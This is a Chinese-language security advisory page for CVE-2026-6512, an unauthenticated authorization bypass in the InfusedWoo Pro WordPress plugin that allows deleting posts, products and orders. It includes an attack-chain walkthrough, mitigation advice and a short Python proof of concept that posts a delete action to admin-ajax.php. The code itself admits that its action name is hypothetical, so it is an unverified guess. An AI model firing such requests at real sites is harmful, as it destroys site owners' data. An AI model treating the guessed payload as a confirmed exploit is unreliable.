CVE-2026-6512 CVSS 9.1 严重

CVE-2026-6512 InfusedWoo Pro授权绕过漏洞

披露日期: 2026-05-14

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-6512

漏洞类型

权限绕过

CVSS评分

9.1 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

InfusedWoo Pro

漏洞概述

WordPress插件InfusedWoo Pro在5.1.2及之前版本中存在授权绕过漏洞。由于插件未能正确验证用户权限，未认证攻击者可利用该漏洞永久删除任意文章、页面、产品或订单，批量删除评论，以及更改文章状态，对网站内容完整性造成严重威胁。

技术细节

该漏洞源于InfusedWoo Pro插件在处理关键管理操作时，未实施严格的访问控制机制。插件代码在处理删除文章、修改状态等请求的回调函数中，直接信任了传入的参数，而未调用WordPress标准的`current_user_can()`函数来验证用户是否具备相应的编辑或管理权限。攻击者无需登录，只需构造特定的HTTP POST请求发送至WordPress的`admin-ajax.php`或相关路由，并附带正确的动作参数和目标ID，即可绕过身份验证。服务器端收到请求后，误以为是由管理员发起的操作，进而执行删除或修改指令，导致数据被篡改或丢失。

攻击链分析

STEP 1

1. 信息收集

攻击者识别目标网站是否安装了InfusedWoo Pro插件，并确认其版本在5.1.2及以下。

STEP 2

2. 发送恶意请求

攻击者构造包含特定动作参数的HTTP POST请求，发送至WordPress的AJAX处理接口，请求中不包含任何认证Cookie。

STEP 3

3. 权限绕过

服务端插件接收到请求后，由于缺少权限校验逻辑，直接执行请求的操作。

STEP 4

4. 数据破坏

攻击者成功删除指定的文章、页面或产品，或者批量删除评论，导致网站数据丢失。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(target_url, post_id):
    # Target endpoint typically is admin-ajax.php for WP plugins
    url = f"{target_url}/wp-admin/admin-ajax.php"
    
    # Payload based on the described vulnerability behavior
    # Specific action name 'infusedwoo_delete_item' is hypothetical as source code is closed
    payload = {
        "action": "infusedwoo_delete_item", 
        "id": post_id,
        "type": "post"
    }
    
    # Sending unauthenticated request
    response = requests.post(url, data=payload)
    
    if response.status_code == 200:
        print(f"[+] Request sent to {url}. Check if post {post_id} is deleted.")
        print(f"[+] Server response: {response.text[:100]}")
    else:
        print(f"[-] Exploit failed with status code: {response.status_code}")

if __name__ == "__main__":
    target = "http://example.com"
    exploit(target, 1)

影响范围

InfusedWoo Pro <= 5.1.2

防御指南

临时缓解措施

建议立即升级InfusedWoo Pro插件至最新版本。若无法立即升级，应暂时禁用该插件以防被利用。同时，配置Web应用防火墙（WAF）以拦截针对该插件未授权API调用请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表